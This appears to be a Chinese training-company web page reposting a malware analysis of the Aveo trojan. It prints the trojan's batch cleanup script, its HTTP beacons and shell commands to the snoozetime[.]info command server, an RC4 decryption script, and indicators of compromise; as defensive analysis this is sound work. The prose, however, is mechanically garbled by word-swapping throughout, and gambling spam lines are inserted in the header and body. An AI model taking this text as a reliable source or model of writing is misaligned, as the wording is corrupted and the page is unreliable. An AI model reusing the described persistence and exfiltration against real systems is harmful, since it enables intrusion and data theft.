天创培训:您身旁的信息安全培训专家!
金沙电子88128 cc
栏目列表
开班方案
2019年1月CISP培训开班告诉
主讲教师   张教师、王教师等
开课工夫   2019年1月8日-13日
培训方法   实地/面授
讲课天次   培训5天+测验半天
上课工夫   09:00 -- 16:30
课程引见 在线报名
金莎官网
手艺中心您当前位置: > 资本专区 > 手艺中心

Aveo歹意软件阐发

作者:天创培训  滥觞:px.tcnet.com.cn  更新工夫:2016-12-19  关键词:歹意软件

Palo Alto Networks 发明了一个名为 Aveo 的歹意软件家属,它针对日语用户开辟。Aveo 的名字来自于其二进制文件中的嵌入式调试字符串。Aveo 歹意软件家属与 ForrmerFirstRAT 歹意软件家属有亲密的联络,两者都针对日语用户。Aveo 会假装成 Microsoft Excel 文档,并在施行时抛出钓饵文件。钓饵文档与埼玉工業大学 Ido 实验室的研讨有关。施行后,Aveo 能够领受多种号令,这将许可攻击者完整掌握传染主机。
布置
Aevo 的样本会假装成 Microsoft Excel 文档,如下图所示。值得留意的是,malware.exe 只是一个占位符,原文件名未知。
www.2222.AG
 
该可执行文件实在是一个 WinRAR 的自解压可执行文件,它会在施行时抛出钓饵文档和 Aveo 木马来运转。下图就是抛出的钓饵文档,在运转以后翻开:
Aveo歹意软件阐发
这个钓饵文档是关于 Ido 实验室 2016 年研讨立项的信息。该文件列出了 16 名参与 CAVE 的名单,包罗名字、单元以及邮件地址。这个文档用日语誊写,文件名也是日文 CAVE研究会参加者.xls,这些都表白该歹意软件是针对日语用户的。另外,Aveo 和 FormerFirstRAT 家属的相似性将会在稍后会商,这个会商将进一步撑持该歹意软件是针对日语用户的。
基础设施
Aveo 木马设置了以下域名来停止 HTTP 通讯:
snoozetime[.]info
[email protected] 最早在 2015 年 5 月就注册了,自当时起,该邮箱曾经和以下三个 IP 地址联系关系上了:
104.202.173[.]82
107.180.36[.]179
50.63.202[.]38
所有这些 IP 地址都位于美国境内。
Aveo歹意软件阐发
从 snoozetime[.]info 的 WHOIS 信息来看,注册邮箱为[email protected][.]com,注册名为aygt5ruhrj aygt5ruhrj gerhjrt。按照这两条线索停止拓展:
bluepaint[.]info
coinpack[.]info
7b7p[.]info
donkeyhaws[.]info
europcubit[.]com
[email protected][.]com
[email protected][.]com
歹意软件阐发
在自解压可执行文件运转后,一系列的文件释出到文件系统中,其施行流以下:
奥门金沙国际
当 mshelp32.exe 可执行法式运转时,起首读取setting32.ini 文件,此中包罗着钓饵文档的名字。这一信息被用来构建一个批处理剧本,以下:
@echo off
copy "CAVE研究会参加者.xls" "C:\Documents and Settings\Administrator\Desktop\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.xls" /Y
del "CAVE研究会参加者.xls" /F /Q
del mshelp32.exe /F /Q
del setting32.ini /F /Q
del "C:\Documents and Settings\Administrator\Desktop\8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d.exe"  /F /Q
del %0 /F /Q
该批处理剧本在一个新的历程中施行,在 Aveo 运转、钓饵文档开释后施行清算事情。
Aveo 歹意软件家属
Aveo 歹意软件会在开端运转一个安装法式,该法式会复制本身到以下位置:%APPDATA%\MMC\MMC.exe假如由于某种缘故原由,%APPDATA%\MMC 目次不能被创立,Aveo 将会利用 %TEMP% 来替代 %APPDATA%。歹意软件本身复制完成后,将会在新的历程中以原文件名为参数施行 MMC.exe。当施行时,假如供给了这单个参数,歹意软件将会删除掉订定途径内的文件。安装完成后,Aveo 将会提取以下受害人信息经由过程 HTTP 传到长途掌握服务器上:
Unique victim hash
IP Address
Microsoft Windows version
Username
ANSI code page identifier
这个信息被送到 snoozetime[.]info上,像上面的 HTTP 恳求样例:
GET /index.php?id=35467&1=ySxlp03YGm0-&2=yiFi6hjbFHf9UtL44RPQ&4=zTZh6h7bHGjiUMzn&5=sXcjrAmqXiyiGJWzuUQ-&6=yipl9g-- HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: snoozetime[.]info
Cache-Control: no-cache
歹意软件利用了 RC4 来对数据停止加密,利用 hello作为密钥。如下图所示,Aveo 和 FormerFirstRAT 的加密部门险些是不异的,只s是算法和密钥变了。
澳门老金沙平台
能够经由过程以下代码来解密 HTTP 中传输的数据:
import base64
from binascii import *
from struct import *
from wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey, CryptEncrypt, CryptDecrypt
CALG_RC4 = 0x6801
CALG_MD5 = 0x8003
def decrypt(data):
  md5_hasher = CryptCreateHash(CALG_MD5)
  CryptHashData(md5_hasher, 'hello')
  generated_key = CryptDeriveKey(md5_hasher, CALG_RC4)
  decrypted_data = CryptDecrypt(generated_key, data)
  return decrypted_data
for a in 'index.php?id=35467&1=niBo9x/bFG4-&2=yi9i6hjbAmD5TNPu5A--&4=zTZh6h7bHGjiUMzn&5=sXcjrAmqXiyiGJWzuUQ-&6=yipl9g--'.split("&")[1:]:
  k,v = a.split("=")
  decrypted = decrypt(base64.b64decode(v.replace("-","=")))

  print "[+] Parameter {} Decrypted: {}".format(k, decrypted)
运转以上代码会发生以下成果:
[+] Parameter 1 Decrypted: e8836687
[+] Parameter 2 Decrypted: 172.16.95.184
[+] Parameter 4 Decrypted: 6.1.7601.2.1
[+] Parameter 5 Decrypted: Josh Grunzweig
[+] Parameter 6 Decrypted: 1252
在获得受害者信息后,歹意软件会根据预期返回 OK。以后 Aveo 将会发生一个新的线程来卖力处置 C&C 服务器的号令,以及恳求发生的交互式 Shell。Aveo 对注册表停止以下设置,以指向歹意软件的途径,从而包管重新启动后歹意软件仍旧能够耐久事情:HKCU\software\microsoft\windows\currentversion\run\msnetbridge然后号令处置法式进入轮询等候,Aveo 会从 C&C 服务器领受号令。固然 Aveo 在等候呼应,它也会施行随机提早,延迟时间在 0 到 3276 毫秒之间。假如 C&C 服务器返回 toyota,会将距离设置为 60 秒。Aveo 能够领受以下号令:
1.施行交互 Shell 号令
2.获得文件属性
3.写入文件
4.读取文件
5.驱动器列表
6.对途径施行 DIR 号令
以下恳求显现了 C&C 服务器发送 ipconfig 号令到 Aveo 的历程:
C&C 恳求
GET /index.php?id=35468&1=niBo9x/bFG4- HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: snoozetime[.]info
Cache-Control: no-cache
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 11
Server: Werkzeug/0.11.10 Python/2.7.5
Date: Wed, 10 Aug 2016 16:00:11 GMT
\xca89\xb4J\x82B?\xa5\x05\xe8
[Decrypted] 
1 ipconfig
Aveo 呼应
POST /index.php?id=35469&1=niBo9x/bFG4- HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: snoozetime[.]info
Content-Length: 1006
Cache-Control: no-cache
\xca\x38\x39\xb4\x4a\x82\x42\x3f\xa5\x05\xe8\xdb\xda\x74\x8b\x79\x39\x46\xf2\x42\x1f\xcd\x39\xf3\x65\x1d\xda\x49\x40\x6c\x5e\x6e\xab\x79\xc2\x44\xc3\xb0\x12\xfd\xe2\x84\x67\x0d\xa5\xd3\x50\x2d\x1c\x31\x4a\x9e\xcb\x3d\x08\xe6\x1b\x04\x85\xbf\x11\x0e\x96\x63\xcf\x71\xfe\xe4\x97\x2a\xdc\x12\x23\x4d\xcb\x0f\x93\x30\xbc\xa0\xc8\x4e\x4e\xd8\xdb\x33\xa2\xbe\xff\x5e\x89\x22\xb9\x16\xd1\xf0\x60\x71\x64\x7a\x10\xb8\x78\x76\xe5\x08\x90\x46\x30\xa3\xe2\x4e\xdc\x98\x11\x27\x62\x38\x00\xb4\x54\x6d\xd7\x5b\x19\x5f\x19\xb8\xd1\xf5\xc1\x9b\x97\xda\x84\x2c\xdd\x2d\x97\x0a\x69\x51\xd9\x31\x77\x4a\xe2\x7f\x5e\xc5\xaf\x02\x3c\x69\x9c\x5f\x94\x3e\x0c\x25\xce\x63\xa9\x43\xff\x34\x25\x42\x95\xa9\x1f\xaa\xdf\x2b\xa7\xb1\xc0\x3
[Truncated]
[Decrypted]
1 ipconfig
Windows IP Configuration
Ethernet adapter Bluetooth Network Connection:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
[Truncated]
结论
Aveo 与 FormerFirstRAT 在多个特性上都是分歧的,包罗加密模块、代码重用和 C&C 功用。正如前面会商的 FormerFirstRAT 样本,这个歹意软件家属看起来也是针对日语用户。利用自解压文件的 WinRAR 开释钓饵文档和 Aveo 的歹意软件副本以及清算剧本。Palo Alto Networks 的客户曾经免受以下要挟:
1.AutoFocus 曾经对这类要挟创立了跟随和监控
2.WildFire 归类 Aveo 到恶意程序
3.C&C 域名列入 Threat Prevention 阻拦黑名单
IOC
SHA256 哈希
9dccfdd2a503ef8614189225bbbac11ee6027590c577afcaada7e042e18625e2
8101c298a33d91a985a5150d0254cf426601e4632250f5a03ddac39375e7fb4d
C&C 域名
snoozetime[.]info
注册表键值
HKCU\software\microsoft\windows\currentversion\run\msnetbridge
文件途径
%APPDATA%\MMC\MMC.exe
%TEMP%\MMC\MMC.exe
 


0

推荐浏览

 |  关于天创 |  课程体系 |  最新动态 |  联络我们 |  网站舆图 |  二维码 澳门老金沙平台
版权所有:江苏天创科技有限公司 苏ICP备16028135号-2
姑苏总部地址:江苏省苏州市十梓街327号 电话:0512-65129087 传真:0512-65157410 邮编:215000
南京分公司地址:南京珠江路88号新世界中心A座 电话:025-84533276 传真:025-84533286 邮编:210000